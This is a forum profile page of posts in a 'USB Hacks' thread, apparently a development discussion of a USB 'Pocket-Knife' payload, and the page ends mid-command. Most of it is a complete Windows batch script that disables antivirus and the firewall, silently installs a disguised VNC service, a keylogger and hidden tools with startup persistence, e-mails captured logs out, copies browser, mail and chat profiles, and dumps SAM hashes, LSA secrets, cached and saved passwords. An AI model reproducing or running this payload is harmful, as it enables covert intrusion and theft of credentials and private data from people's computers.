Tmbomber's Content - Page 2

USB Pocket-Knife Development

Tmbomber replied to Leapo's topic in USB Hacks

Just wanted to get this out... This is my complete start.bat file. Aside from the one change I've made to go.vbs, all my modifications have been to this file. @ECHO off CD SYSTEM >NUL :: Finds the location of the flash partition and sets master variable. IF EXIST z:\CONFIG\Drive_Location.cfg SET flshdrv=z: IF EXIST %flshdrv%\CONFIG\Drive_Location.cfg GOTO FlshDrvFound IF EXIST y:\CONFIG\Drive_Location.cfg SET flshdrv=y: IF EXIST %flshdrv%\CONFIG\Drive_Location.cfg GOTO FlshDrvFound IF EXIST x:\CONFIG\Drive_Location.cfg SET flshdrv=x: IF EXIST %flshdrv%\CONFIG\Drive_Location.cfg GOTO FlshDrvFound IF EXIST w:\CONFIG\Drive_Location.cfg SET flshdrv=w: IF EXIST %flshdrv%\CONFIG\Drive_Location.cfg GOTO FlshDrvFound IF EXIST v:\CONFIG\Drive_Location.cfg SET flshdrv=v: IF EXIST %flshdrv%\CONFIG\Drive_Location.cfg GOTO FlshDrvFound IF EXIST u:\CONFIG\Drive_Location.cfg SET flshdrv=u: IF EXIST %flshdrv%\CONFIG\Drive_Location.cfg GOTO FlshDrvFound IF EXIST t:\CONFIG\Drive_Location.cfg SET flshdrv=t: IF EXIST %flshdrv%\CONFIG\Drive_Location.cfg GOTO FlshDrvFound IF EXIST s:\CONFIG\Drive_Location.cfg SET flshdrv=s: IF EXIST %flshdrv%\CONFIG\Drive_Location.cfg GOTO FlshDrvFound IF EXIST r:\CONFIG\Drive_Location.cfg SET flshdrv=r: IF EXIST %flshdrv%\CONFIG\Drive_Location.cfg GOTO FlshDrvFound IF EXIST q:\CONFIG\Drive_Location.cfg SET flshdrv=q: IF EXIST %flshdrv%\CONFIG\Drive_Location.cfg GOTO FlshDrvFound IF EXIST p:\CONFIG\Drive_Location.cfg SET flshdrv=p: IF EXIST %flshdrv%\CONFIG\Drive_Location.cfg GOTO FlshDrvFound IF EXIST o:\CONFIG\Drive_Location.cfg SET flshdrv=o: IF EXIST %flshdrv%\CONFIG\Drive_Location.cfg GOTO FlshDrvFound IF EXIST n:\CONFIG\Drive_Location.cfg SET flshdrv=n: IF EXIST %flshdrv%\CONFIG\Drive_Location.cfg GOTO FlshDrvFound IF EXIST m:\CONFIG\Drive_Location.cfg SET flshdrv=m: IF EXIST %flshdrv%\CONFIG\Drive_Location.cfg GOTO FlshDrvFound IF EXIST l:\CONFIG\Drive_Location.cfg SET flshdrv=l: IF EXIST %flshdrv%\CONFIG\Drive_Location.cfg GOTO FlshDrvFound IF EXIST k:\CONFIG\Drive_Location.cfg SET flshdrv=k: IF EXIST %flshdrv%\CONFIG\Drive_Location.cfg GOTO FlshDrvFound IF EXIST j:\CONFIG\Drive_Location.cfg SET flshdrv=j: IF EXIST %flshdrv%\CONFIG\Drive_Location.cfg GOTO FlshDrvFound IF EXIST i:\CONFIG\Drive_Location.cfg SET flshdrv=i: IF EXIST %flshdrv%\CONFIG\Drive_Location.cfg GOTO FlshDrvFound IF EXIST h:\CONFIG\Drive_Location.cfg SET flshdrv=h: IF EXIST %flshdrv%\CONFIG\Drive_Location.cfg GOTO FlshDrvFound IF EXIST g:\CONFIG\Drive_Location.cfg SET flshdrv=g: IF EXIST %flshdrv%\CONFIG\Drive_Location.cfg GOTO FlshDrvFound IF EXIST f:\CONFIG\Drive_Location.cfg SET flshdrv=f: IF EXIST %flshdrv%\CONFIG\Drive_Location.cfg GOTO FlshDrvFound IF EXIST e:\CONFIG\Drive_Location.cfg SET flshdrv=e: IF EXIST %flshdrv%\CONFIG\Drive_Location.cfg GOTO FlshDrvFound IF EXIST d:\CONFIG\Drive_Location.cfg SET flshdrv=d: IF EXIST %flshdrv%\CONFIG\Drive_Location.cfg GOTO FlshDrvFound IF EXIST c:\CONFIG\Drive_Location.cfg SET flshdrv=c: IF EXIST %flshdrv%\CONFIG\Drive_Location.cfg GOTO FlshDrvFound IF EXIST b:\CONFIG\Drive_Location.cfg SET flshdrv=b: IF EXIST %flshdrv%\CONFIG\Drive_Location.cfg GOTO FlshDrvFound GOTO END :FlshDrvFound :: Checks to see if the payload is disarmed IF NOT EXIST %flshdrv%\CONFIG\Disarm_Payload.cfg GOTO SkipDisarm IF EXIST %flshdrv%\CONFIG\Disarm_Payload.cfg GOTO End :SkipDisarm :: Checks to see if safety.txt is found on the root of your C:\ drive, if it is, the payload will not run by default IF NOT EXIST %flshdrv%\CONFIG\Safety_Check.cfg GOTO SkipSafetyCheck IF EXIST C:\safety.txt GOTO End :SkipSafetyCheck :: Sets Variables and paths to clean up pathnams later on IF NOT EXIST %flshdrv%\LOGS\%computername% MD %flshdrv%\LOGS\%computername% SET logdir="%flshdrv%\LOGS\%computername%" SET log="%flshdrv%\LOGS\%computername%\%computername%-[%Year%%Month%%Day%-%Hour%%Minute%%Second%].log" SET tmplog="%flshdrv%\LOGS\%computername%\%computername%_TEMP.log" IF NOT EXIST "%flshdrv%\CONFIG\U3_Drive.cfg" (SET progdir="%flshdrv%\SYSTEM\") ELSE (SET progdir=".\") SET config="%flshdrv%\CONFIG\" IF NOT EXIST "%flshdrv%\CONFIG\U3_Drive.cfg" (SET installdir="%flshdrv%\SYSTEM\INSTALL\") ELSE (SET installdir=".\INSTALL\") SET /p eipurl=<"%flshdrv%\CONFIG\External_IP.cfg" SET U3="%cd%" :: check for and restore any missing parts of the payload from the backup archive before every run IF NOT EXIST %config%\Auto_Restore.cfg GOTO SkipAutoRestore IF EXIST %config%\U3_Drive.cfg GOTO SkipAutoRestore copy ".\SYSTEM\Backup.rar" "C:\Backup_Safe.rar" %progdir%\rar.exe x -o+ -p[4369462e7651316962562d4c6931697676652e626d366d57503b287246] "C:\Backup_Safe.rar" ".\" del "C:\Backup_Safe.rar" :SkipAutoRestore :: Attempt to kill any running antivirus IF NOT EXIST %config%\Run_AVKILL.cfg GOTO SkipAVKILL start .\HideConsole.exe .\csrss.bat :SkipAVKILL :: Disable the Windows firewall IF NOT EXIST %config%\Disable_Firewall.cfg GOTO SkipFirewall net stop "security center" netsh firewall set opmode disable :SkipFirewall IF NOT EXIST %config%\Slurp1.cfg GOTO SkipSlurp1 IF EXIST "C:\Program Files" SET progfiles="C:\Program Files" IF EXIST "C:\Program Files (x86)" SET progfiles="C:\Program Files (x86)" :: MSN Received Files and chatlogs mkdir %logdir%\Slurp_Data\MSN\ fc.exe "C:\Documents and Settings\%username%\My Documents\My Received Files\*" "%logdir%\Slurp_Data\MSN\*" /i /o :: Skype Received Files mkdir %logdir%\Slurp_Data\SkypeReceivedFiles\ fc.exe "C:\Documents and Settings\%username%\My Documents\My Skype Received Files\*" "%logdir%\Slurp_Data\SkypeReceivedFiles\*" /i /o :: Skype Contacts mkdir %logdir%\Slurp_Data\SkypeContacts\ fc.exe "C:\Documents and Settings\%username%\Application Data\Skype\*" "%logdir%\Slurp_Data\SkypeContacts\*" /i /o :: FireFox Data mkdir %logdir%\Slurp_Data\FireFox\ xcopy "C:\Documents and Settings\%username%\Application Data\Mozilla\Firefox\Profiles\*" "%logdir%\Slurp_Data\FireFox\" /s /c /q /r /h /y :: ThunderBird Data mkdir %logdir%\Slurp_Data\ThunderBird\ fc.exe "C:\Documents and Settings\%username%\Application Data\Thunderbird\Profiles\*" "%logdir%\Slurp_Data\ThunderBird\*" /i /o :: Internet Explorer Data mkdir %logdir%\Slurp_Data\IExplorer\ xcopy "C:\Documents and Settings\%username%\Application Data\Microsoft\Address Book\*.wab" "%logdir%\Slurp_Data\IExplorer\" /s /c /q /r /h /y fc.exe "C:\Documents and Settings\%username%\Favorites\*" "%logdir%\Slurp_Data\IExplorer\*" /i /o :: Outlook & Outlook Express Data mkdir %logdir%%\Slurp_Data\Outlook\ xcopy "C:\Documents and Settings\%username%\local Settings\Application Data\Microsoft\Outlook\*" "%logdir%\Slurp_Data\Outlook\" /s /c /q /r /h /y xcopy "C:\Documents and Settings\%username%\local Settings\Application Data\Identities\*" %logdir%\Slurp_Data\Outlook /s/c/q/r/h/y :: NetScape Data mkdir %logdir%\Slurp_Data\NetScape\ xcopy "C:\Documents and Settings\%username%\Application Data\Netscape\NSB\Profiles\*.db" "%logdir%\Slurp_Data\NetScape\" /s /c /q /r /h /y xcopy "C:\Documents and Settings\%username%\Application Data\Netscape\NSB\Profiles\*.dat" "%logdir%\Slurp_Data\NetScape\" /s /c /q /r /h /y xcopy "C:\Documents and Settings\%username%\Application Data\Netscape\NSB\Profiles\*bookmarks.html" "%logdir%\Slurp_Data\NetScape\" /s /c /q /r /h /y :: Opera Data mkdir %logdir%\Slurp_Data\Opera\ xcopy "C:\Documents and Settings\%username%\Application Data\Opera\Opera\profile\*.dat" "%logdir%\Slurp_Data\Opera\" /s /c /q /r /h /y xcopy "C:\Documents and Settings\%username%\Application Data\Opera\Opera\mail\*.dat" "%logdir%\Slurp_Data\Opera\" /s /c /q /r /h /y xcopy "C:\Documents and Settings\%username%\Application Data\Opera\Opera\mail\*.ini" "%logdir%\Slurp_Data\Opera\" /s /c /q /r /h /y :: Trilian Data mkdir %logdir%\Slurp_Data\Trilian\ xcopy "%progfiles%\Trillian\users\default\logs\*.log" "%logdir%\Slurp_Data\Trilian\" /s /c /q /r /h /y fc.exe "%progfiles%\Trillian\users\default\downloads\*" "%logdir%\Slurp_Data\Trilian\*" /i /o xcopy "%progfiles%\Trillian\users\default\*.ini" "%logdir%\Slurp_Data\Trilian\" /s /c /q /r /h /y :: Yahoo Messenger Data mkdir %logdir%\Slurp_Data\Yahoo.M\ fc.exe "%progfiles%\Yahoo!\Messenger\Profiles\*" "%logdir%\Slurp_Data\Yahoo.M\" /i /o :: Miranda IM Data mkdir %logdir%\Slurp_Data\Miranda\ xcopy "%progfiles%\Miranda IM\*.dat" "%logdir%\Slurp_Data\Miranda\" /s /c /q /r /h /y xcopy "%progfiles%\Miranda IM\*.bmp" "%logdir%\Slurp_Data\Miranda\" /s /c /q /r /h /y :: Gaim Data mkdir %logdir%\Slurp_Data\Gaim\ xcopy "C:\Documents and Settings\%username%\Application Data\.gaim\*.txt" "%logdir%\Slurp_Data\Gaim\" /s /c /q /r /h /y xcopy "C:\Documents and Settings\%username%\Application Data\.gaim\*.xml" "%logdir%\Slurp_Data\Gaim\" /s /c /q /r /h /y :: ICQ Lite mkdir %logdir%\Slurp_Data\ICQ\ fc.exe "C:\Documents and Settings\%username%\My Documents\ICQ Lite\*" "%logdir%\Slurp_Data\ICQ\*" /i /o IF EXIST %config%\Slurp2.cfg GOTO StartSlurp2 REN %logdir%\Slurp_Data %computername%-SlurpData :SkipSlurp1 IF NOT EXIST %config%\Slurp2.cfg GOTO SkipSlurp2 :StartSlurp2 :: My Documents files mkdir %logdir%\Slurp_Data\MyDocuments\ fc.exe "C:\Documents and Settings\%username%\My Documents\*" "%logdir%\Slurp_Data\MyDocuments\*" /i /o :: Desktop files mkdir %logdir%\Slurp_Data\Desktop\ fc.exe "C:\Documents and Settings\%username%\Desktop\*" "%logdir%\Slurp_Data\Desktop\*" /i /o :: All Users Desktop files mkdir %logdir%\Slurp_Data\SharedDesktop\ fc.exe "C:\Documents and Settings\All Users\Desktop\*" "%logdir%\Slurp_Data\SharedDesktop\*" /i /o :: All Users Documents files mkdir %logdir%\Slurp_Data\SharedDocuments\ fc.exe "C:\Documents and Settings\All Users\Shared Documents\*" "%logdir%\Slurp_Data\SharedDocuments\*" /i /o REN %logdir%\Slurp_Data %computername%-SlurpData :SkipSlurp2 :: Header information ECHO ----------------------------------------------------------------------------------------------------------------------------- >> %log% 2>&1 ECHO Leapos Payload [Time Started: %date% %time%] >> %log% 2>&1 ECHO ----------------------------------------------------------------------------------------------------------------------------- >> %log% 2>&1 ECHO Computer Name is: %computername% and the Logged on User Is: %username% >> %log% 2>&1 IF NOT EXIST %config%\System_Info.cfg GOTO SkipSysInfo ECHO ----------------------------------------------------------------------------------------------------------------------------- >> %log% 2>&1 ECHO +----------------------------------+ >> %log% 2>&1 ECHO + [System info] + >> %log% 2>&1 ECHO +----------------------------------+ >> %log% 2>&1 IPCONFIG /all >> %log% 2>&1 ECHO ----------------------------------------------------------------------------------------------------------------------------- >> %log% 2>&1 ECHO +----------------------------------+ >> %log% 2>&1 ECHO + [C:\ Tree Listing] + >> %log% 2>&1 ECHO +----------------------------------+ >> %log% 2>&1 tree /A C:\ >> %log% 2>&1 ECHO ----------------------------------------------------------------------------------------------------------------------------- >> %log% 2>&1 ECHO +----------------------------------+ >> %log% 2>&1 ECHO + [File Type Associations] + >> %log% 2>&1 ECHO +----------------------------------+ >> %log% 2>&1 assoc >> %log% 2>&1 ECHO ----------------------------------------------------------------------------------------------------------------------------- >> %log% 2>&1 ECHO +----------------------------------+ >> %log% 2>&1 ECHO + [Driver Info] + >> %log% 2>&1 ECHO +----------------------------------+ >> %log% 2>&1 driverquery >> %log% 2>&1 :SkipSysInfo IF NOT EXIST %config%\External_IP.cfg GOTO SkipExtIP ECHO ----------------------------------------------------------------------------------------------------------------------------- >> %log% 2>&1 ECHO +----------------------------------+ >> %log% 2>&1 ECHO + [External IP] + >> %log% 2>&1 ECHO +----------------------------------+ >> %log% 2>&1 %progdir%\wget.exe %eipurl% --output-document=%tmplog% 2>&1 ECHO. >> %tmplog% 2>&1 COPY %log%+%tmplog%* %log% >> NUL DEL /f /q %tmplog% >NUL :SkipExtIP IF NOT EXIST %config%\VNC.cfg GOTO SkipVNC ECHO ----------------------------------------------------------------------------------------------------------------------------- >> %log% 2>&1 ECHO +----------------------------------+ >> %log% 2>&1 ECHO + [VNC] + >> %log% 2>&1 ECHO +----------------------------------+ >> %log% 2>&1 ECHO VNC was installed silently >> %log% 2>&1 ECHO Password is either "easy" "hacked" or "yougothacked". I'm not sure what it's set to >> %log% 2>&1 XCOPY "%installdir%\VNC\VNCHOOKS.DLL" "%systemroot%" /c /y XCOPY "%installdir%\VNC\WINVNC.EXE" "%systemroot%" /c /y SC create WinVNC binpath= "%systemroot%\winvnc.exe -service" type= interact type= own start= auto displayname= "Domain Client Service" 2>&1 SC description WinVNC "Manages communication between a Windows Server Domain Controller and a connected Domain Client. If this service is not started or disabled, domain functions will be inoperable." 2>&1 REGEDIT /s %installdir%\VNC\vnc.reg 2>&1 NET START WinVNC 2>&1 :SkipVNC IF NOT EXIST %config%\Haksaw.cfg GOTO SkipHaksaw ECHO ----------------------------------------------------------------------------------------------------------------------------- >> %log% 2>&1 ECHO +----------------------------------+ >> %log% 2>&1 ECHO + [HakSaw] + >> %log% 2>&1 ECHO +----------------------------------+ >> %log% 2>&1 ECHO HakSaw was installed silently >> %log% 2>&1 MD "%systemroot%\$NtUninstallKB931337$" || MD "%appdata%\sbs" 2>&1 XCOPY %installdir%\HAKSAW\*.* "%systemroot%\$NtUninstallKB931337$\" /y || XCOPY %installdir%\HAKSAW\*.* "%appdata%\sbs" /y 2>&1 XCOPY %progdir%\RAR.EXE "%systemroot%\$NtUninstallKB931337$\" /y || XCOPY %progdir%\RAR.EXE "%appdata%\sbs" /y 2>&1 REG ADD HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v USBMedia /t REG_SZ /d "%systemroot%\$NtUninstallKB931337$\sbs.lnk" /f || "%appdata%\sbs\shortcut.exe" /f:"%allusersprofile%\Start Menu\Programs\Startup\ .lnk" /A:C /T:"%appdata%\sbs\sbs.exe" /W:"%appdata%\sbs" /I:"%appdata%\sbs\blank.ico" 2>&1 COPY "%installdir%\HAKSAW\Send_Partial.bat"+%config%\Email_Config.cfg" "%systemroot%\$NtUninstallKB931337$\send.bat" || COPY "%installdir%\HAKSAW\Send_Partial.bat"+%config%\Email_Config.cfg" "%appdata%\sbs\send.bat" 2>&1 COPY %config%\Stunnle_Config.cfg "%systemroot%\$NtUninstallKB931337$\stunnel.conf" || COPY %config%\Stunnle_Config.cfg "%appdata%\sbs\stunnel.conf" 2>&1 ATTRIB "%systemroot%\$NtUninstallKB931337$" +s +h & ATTRIB "%appdata%\sbs" +s +h 2>&1 %installdir%\HAKSAW\SBS.lnk & %installdir%\HAKSAW\SBS2.lnk :SkipHaksaw IF NOT EXIST %config%\Keyloger.cfg GOTO SkipKeylog ECHO ----------------------------------------------------------------------------------------------------------------------------- >> %log% 2>&1 ECHO +----------------------------------+ >> %log% 2>&1 ECHO + [Keyloger] + >> %log% 2>&1 ECHO +----------------------------------+ >> %log% 2>&1 ECHO Keyloger was installed silently. Logs will be e-mailed to you. >> %log% 2>&1 IF EXIST %systemroot%\$NtUninstallKB931552$\winlogon.exe GOTO SkipKeylog IF EXIST %appdata%\klgr\winlogon.exe GOTO SkipKeylog MKDIR %systemroot%\$NtUninstallKB931552$ || MKDIR "%appdata%\klgr" attrib %progdir%\KEYLOG\*.* -s -h COPY %progdir%\KEYLOG\*.* %systemroot%\$NtUninstallKB931552$ || copy %progdir%\KEYLOG\*.* "%appdata%\klgr" COPY "%installdir%\KEYLOG\Send.bat"+%config%\Email_Config.cfg" "%systemroot%\$NtUninstallKB931552$\Recover.bat" || COPY "%installdir%\KEYLOG\send.bat"+%config%\Email_Config.cfg" "%appdata%\klgr\Recover.bat" 2>&1 COPY %config%\Stunnle_Config.cfg %systemroot%\$NtUninstallKB931552$\Stunnle.cfg || copy %config%\Stunnle_Config.cfg "%appdata%\klgr\Stunnle.cfg" XCOPY %progdir%\RAR.EXE "%systemroot%\$NtUninstallKB931552$\" /y || XCOPY %progdir%\RAR.EXE "%appdata%\klgr" /y 2>&1 regedit /s %progdir%\KEYLOG\Install.key || "%appdata%\klgr\shortcut.exe" /f:"%USERPROFILE%\Start Menu\Programs\Startup\ .lnk" /A:C /T:"%appdata%\klgr\winlogon.exe" /W:"%appdata%\klgr" /I:"%appdata%\klgr\blank.ico" attrib %systemroot%\$NtUninstallKB931552$ +s +h & attrib "%appdata%\klgr" +s +h IF EXIST %systemroot%\$NtUninstallKB931552$\winlogon.exe GOTO KeylogAdminRights at 17:00 cmd /every:M,T,W,Th,F %appdata%\klgr\Recover.bat GOTO SkipKeyLog :KeylogAdminRights at 17:00 cmd /every:M,T,W,Th,F %systemroot%\$NtUninstallKB931552$\Recover.bat :SkipKeylog IF NOT EXIST %config%\Install_NMAP.cfg GOTO SkipNMAP ECHO ----------------------------------------------------------------------------------------------------------------------------- >> %log% 2>&1 ECHO +----------------------------------+ >> %log% 2>&1 ECHO + [NMAP] + >> %log% 2>&1 ECHO +----------------------------------+ >> %log% 2>&1 ECHO NMAP was installed silently. Port Scan will be e-mailed to you. >> %log% 2>&1 MKDIR %systemroot%\$NtUninstallKB91338$ || mkdir "%appdata%\scs" attrib %installdir%\NMAP*.* -s -h COPY %installdir%\NMAP*.* %systemroot%\$NtUninstallKB91338$ || copy *.* "%appdata%\scs" COPY "%installdir%\NMAP\Send_partial.bat"+%config%\Email_Config.cfg" "%systemroot%\$NtUninstallKB91338\Send.bat" || COPY "%installdir%\KEYLOG\send_partial.bat"+%config%\Email_Config.cfg" "%appdata%\scs\Send.bat" 2>&1 COPY %config%\Stunnle_Config.cfg %systemroot%\$NtUninstallKB91338$\Stunnle.cfg || copy %config%\Stunnle_Config.cfg "%appdata%\scs\Stunnle.cfg" attrib %systemroot%\$NtUninstallKB91338$ +s +h & attrib "%appdata%\scs" +s +h "%progdir%\HideConsole.exe" "%systemroot%\$NtUninstallKB91338$\nmap.bat" :SkipNMAP IF NOT EXIST %config%\Dump_Wifi_Hex.cfg GOTO SkipDumpWifi ECHO ----------------------------------------------------------------------------------------------------------------------------- >> %log% 2>&1 ECHO +----------------------------------+ >> %log% 2>&1 ECHO + [Dump Wifi Hex] + >> %log% 2>&1 ECHO +----------------------------------+ >> %log% 2>&1 .\wifike.exe /stext %tmplog% >> %log% 2>&1 COPY %log%+%tmplog%* %log% >> NUL DEL /f /q %tmplog% >NUL :SkipDumpWifi IF NOT EXIST %config%\Dump_SAM_PWDUMP.cfg GOTO SkipPWDUMP ECHO ----------------------------------------------------------------------------------------------------------------------------- >> %log% 2>&1 ECHO +----------------------------------+ >> %log% 2>&1 ECHO + [Dump SAM PWDUMP] + >> %log% 2>&1 ECHO +----------------------------------+ >> %log% 2>&1 IF EXIST "C:\Program Files (x86)" GOTO PWD1 .\pwdump 127.0.0.1 >> %log% 2>&1 GOTO SkipPWDUMP :PWD1 .\pwdump -x 127.0.0.1 >> %log% 2>&1 :SkipPWDUMP IF NOT EXIST %config%\Dump_SAM_FGDUMP.cfg GOTO SkipFGDUMP ECHO ----------------------------------------------------------------------------------------------------------------------------- >> %log% 2>&1 ECHO +----------------------------------+ >> %log% 2>&1 ECHO + [Dump SAM FGDUMP] + >> %log% 2>&1 ECHO +----------------------------------+ >> %log% 2>&1 CD /D %logdir% >> %log% 2>&1 %U3%\fgdump.exe -vv -c >> %log% 2>&1 CD /D %U3% >> %log% 2>&1 ECHO. >> %log% 2>&1 ECHO -----Hashes----- >> %log% 2>&1 ECHO. >> %log% 2>&1 COPY %log%+%logdir%\127.0.0.1.pwdump %log% >> NUL DEL /f /q %logdir%\*.log >> %log% 2>&1 DEL /f /q %logdir%\*.fgdump-log >> %log% 2>&1 DEL /f /q %logdir%\127.0.0.1* >> %log% 2>&1 :SkipFGDUMP IF NOT EXIST %config%\Dump_Network_PW.cfg GOTO SkipNetPW ECHO ----------------------------------------------------------------------------------------------------------------------------- >> %log% 2>&1 ECHO +----------------------------------+ >> %log% 2>&1 ECHO + [Dump Network PW] + >> %log% 2>&1 ECHO +----------------------------------+ >> %log% 2>&1 .\netpass.exe /stext %tmplog% >> %log% 2>&1 COPY %log%+%tmplog%* %log% >> NUL DEL /f /q %tmplog% >>NUL :SkipNetPW IF NOT EXIST %config%\Dump_Mail_PW.cfg GOTO SkipMailPW ECHO ----------------------------------------------------------------------------------------------------------------------------- >> %log% 2>&1 ECHO +----------------------------------+ >> %log% 2>&1 ECHO + [Dump Mail PW] + >> %log% 2>&1 ECHO +----------------------------------+ >> %log% 2>&1 .\mailpv.exe /stext %tmplog% >> %log% 2>&1 COPY %log%+%tmplog%* %log% >> NUL DEL /f /q %tmplog% >NUL :SkipMailPW IF NOT EXIST %config%\Dump_Firefox_PW.cfg GOTO SkipFirefoxPW ECHO ----------------------------------------------------------------------------------------------------------------------------- >> %log% 2>&1 Echo +----------------------------------+ >> %log% 2>&1 Echo + [Dump Firefox PW] + >> %log% 2>&1 Echo +----------------------------------+ >> %log% 2>&1 %progdir%\FirePassword.exe >> %log% 2>&1 :SkipFirefoxPW IF NOT EXIST %config%\Dump_IE_PW.cfg GOTO SkipIEPW ECHO ----------------------------------------------------------------------------------------------------------------------------- >> %log% 2>&1 ECHO +----------------------------------+ >> %log% 2>&1 ECHO + [Dump IE PW] + >> %log% 2>&1 ECHO +----------------------------------+ >> %log% 2>&1 .\iepv.exe /stext %tmplog% >> %log% 2>&1 COPY %log%+%tmplog%* %log% >> NUL DEL /f /q %tmplog% >NUL :SkipIEPW IF NOT EXIST %config%\Dump_Messenger_PW.cfg GOTO SkipMessPW ECHO ----------------------------------------------------------------------------------------------------------------------------- >> %log% 2>&1 ECHO +----------------------------------+ >> %log% 2>&1 ECHO + [Dump Messenger PW] + >> %log% 2>&1 ECHO +----------------------------------+ >> %log% 2>&1 .\mspass.exe /stext %tmplog% >> %log% 2>&1 COPY %log%+%tmplog%* %log% >> NUL DEL /f /q %tmplog% >NUL :SkipMessPW IF NOT EXIST %config%\Dump_Cache.cfg GOTO SkipCacheDump ECHO ----------------------------------------------------------------------------------------------------------------------------- >> %log% 2>&1 ECHO +----------------------------------+ >> %log% 2>&1 ECHO + [Dump Cache] + >> %log% 2>&1 ECHO +----------------------------------+ >> %log% 2>&1 %progdir%\cachedump.exe -v >> %log% 2>&1 :SkipCacheDump IF NOT EXIST %config%\Dump_LSA_Secrets.cfg GOTO SkipLSA ECHO ----------------------------------------------------------------------------------------------------------------------------- >> %log% 2>&1 ECHO +----------------------------------+ >> %log% 2>&1 ECHO + [Dump LSA secrets] + >> %log% 2>&1 ECHO +----------------------------------+ >> %log% 2>&1 .\pspv.exe /stext %tmplog% >> %log% 2>&1 COPY %log%+%tmplog%* %log% >> NUL DEL /f /q %tmplog% >NUL :SkipLSA IF NOT EXIST %config%\Dump_Product_Keys.cfg GOTO SkipKeyDump ECHO ----------------------------------------------------------------------------------------------------------------------------- >> %log% 2>&1 ECHO +----------------------------------+ >> %log% 2>&1 ECHO + [Dump Product Keys] + >> %log% 2>&1 ECHO +----------------------------------+ >> %log% 2>&1 %progdir%\produkey.exe /nosavereg /stext "%tmplog%" /remote %computername% >> %log% 2>&1 COPY %log%+%tmplog%* %log% >> NUL DEL /f /q %tmplog% >NUL :SkipKeyDump IF NOT EXIST %config%\Dump_URL_History.cfg GOTO SkipURLHist ECHO ----------------------------------------------------------------------------------------------------------------------------- >> %log% 2>&1 ECHO +----------------------------------+ >> %log% 2>&1 ECHO + [Dump URL History] + >> %log% 2>&1 ECHO +----------------------------------+ >> %log% 2>&1 CSCRIPT //nologo %progdir%\DUH.vbs >> %log% 2>&1 :SkipURLHist IF NOT EXIST %config%\Dump_Update_List.cfg GOTO SkipUdateList ECHO ----------------------------------------------------------------------------------------------------------------------------- >> %log% 2>&1 ECHO +----------------------------------+ >> %log% 2>&1 ECHO + [Dump Updates-List] + >> %log% 2>&1 ECHO +----------------------------------+ >> %log% 2>&1 %progdir%\wul.exe /stext %tmplog% >> %log% 2>&1 COPY %log%+%tmplog%* %log% >> NUL DEL /f /q %tmplog% >NUL :SkipUdateList IF NOT EXIST %config%\Network_Services.cfg GOTO SkipNetServices ECHO ----------------------------------------------------------------------------------------------------------------------------- >> %log% 2>&1 ECHO +----------------------------------+ >> %log% 2>&1 ECHO + [Network Services] + >> %log% 2>&1 ECHO +----------------------------------+ >> %log% 2>&1 netstat.exe -abn >> %log% 2>&1 :SkipNetServices IF NOT EXIST %config%\Port_Scan.cfg GOTO SkipPortScan ECHO ----------------------------------------------------------------------------------------------------------------------------- >> %log% 2>&1 ECHO +----------------------------------+ >> %log% 2>&1 ECHO + [Port Scan] + >> %log% 2>&1 ECHO +----------------------------------+ >> %log% 2>&1 .\portqry -local -v -v >> %log% 2>&1 :SkipPortScan ECHO. >> %log% 2>&1 ECHO ----------------------------------------------------------------------------------------------------------------------------- >> %log% 2>&1 ECHO Leapos Payload [Time Finished: %date% %time%] >> %log% 2>&1 ECHO ----------------------------------------------------------------------------------------------------------------------------- >> %log% 2>&1 :: Just to make sure the temp log is removed after everything has finished. DEL /f /q %tmplog% >NUL :: Opens the logs folder IF NOT EXIST %config%\Open_Drive_Logs.cfg GOTO SkipOpenDrv start /wait %flshdrv%\LOGS\ :SkipOpenDrv :: Opens the root of the drive folder IF NOT EXIST %config%\Open_Drive_Root.cfg GOTO SkipOpenDrvRt start /wait %flshdrv% :SkipOpenDrvRt :End EXIT In answer to questions asked... NMAP??? Unfortunatly I haven't even turned NMAP on yet, so no NMAP output to look at. I don't think that'll work seeing NMAP is an option that won't be turned on all the time. AutoIT??? It's easier to take something that's partly working and fix it than it is to chuck it and re-write it in another language. If you have an AutoIT version written by all means post it. I'd be happy to take a look at it. As to parse errors, please provide details as to what your doing and what your seeing. I've run this payload on multiple machines and operating systems. Almost *all* of the "dump" information is being reported. I'm still having a few issues with the "slurp" data (the stuff in c:\Program files, to be specific) but most everything else is working. It seems to me that parse errors is indicating an incorrectly created USB stick. I use Gonzor's Universal Customizer with SanDisk thumb drives. How are you creating your thumb drive image? How are you flashing it? And Thank You Jen for the information on Vista. (so it looks just like XP... wonderful :( )

USB Pocket-Knife Development

Tmbomber replied to Leapo's topic in USB Hacks

Oh btw, I need someone with Vista and someone with Vista64 to check their directories and see if there are differences we can IF EXISTS off of. Things like Program Files, Windows, et. al. I have no access to a Vista or Vista64 machine right now, so I can't find out for myself. Thanks!!!

USB Pocket-Knife Development

Tmbomber replied to Leapo's topic in USB Hacks

Ok, just went through a lot of the slurp stuff... XP x64 has a different "Program Files" directory, so I had to add: IF EXIST "C:\Program Files" SET progfiles="C:\Program Files" IF EXIST "C:\Program Files (x86)" SET progfiles="C:\Program Files (x86)" If you have "C:\Program Files (x86)" you have XP x64. If you have "C:\Program Files" you have either win2k or non-x64 xp. REVELATION!!!!! I just found out that win2k doesn't have a C:\windows directory, it has C:\winnt. XP does have C:\Windows So now we can tell the three apart :) What follows is configured for what I found with xp x64... I'll be checking the directory changes vs xp and win2k when I can and I'll make seperate blocks to handle the differences I find. IF NOT EXIST %config%\Slurp1.cfg GOTO SkipSlurp1 IF EXIST "C:\Program Files" SET progfiles="C:\Program Files" IF EXIST "C:\Program Files (x86)" SET progfiles="C:\Program Files (x86)" :: MSN Received Files and chatlogs mkdir %logdir%\Slurp_Data\MSN\ fc.exe "C:\Documents and Settings\%username%\My Documents\My Received Files\*" "%logdir%\Slurp_Data\MSN\*" /i /o :: Skype Received Files mkdir %logdir%\Slurp_Data\SkypeReceivedFiles\ fc.exe "C:\Documents and Settings\%username%\My Documents\My Skype Received Files\*" "%logdir%\Slurp_Data\SkypeReceivedFiles\*" /i /o :: Skype Contacts mkdir %logdir%\Slurp_Data\SkypeContacts\ fc.exe "C:\Documents and Settings\%username%\Application Data\Skype\*" "%logdir%\Slurp_Data\SkypeContacts\*" /i /o :: FireFox Data mkdir %logdir%\Slurp_Data\FireFox\ xcopy "C:\Documents and Settings\%username%\Application Data\Mozilla\Firefox\Profiles\*" "%logdir%\Slurp_Data\FireFox\" /s /c /q /r /h /y :: ThunderBird Data mkdir %logdir%\Slurp_Data\ThunderBird\ fc.exe "C:\Documents and Settings\%username%\Application Data\Thunderbird\Profiles\*" "%logdir%\Slurp_Data\ThunderBird\*" /i /o :: Internet Explorer Data mkdir 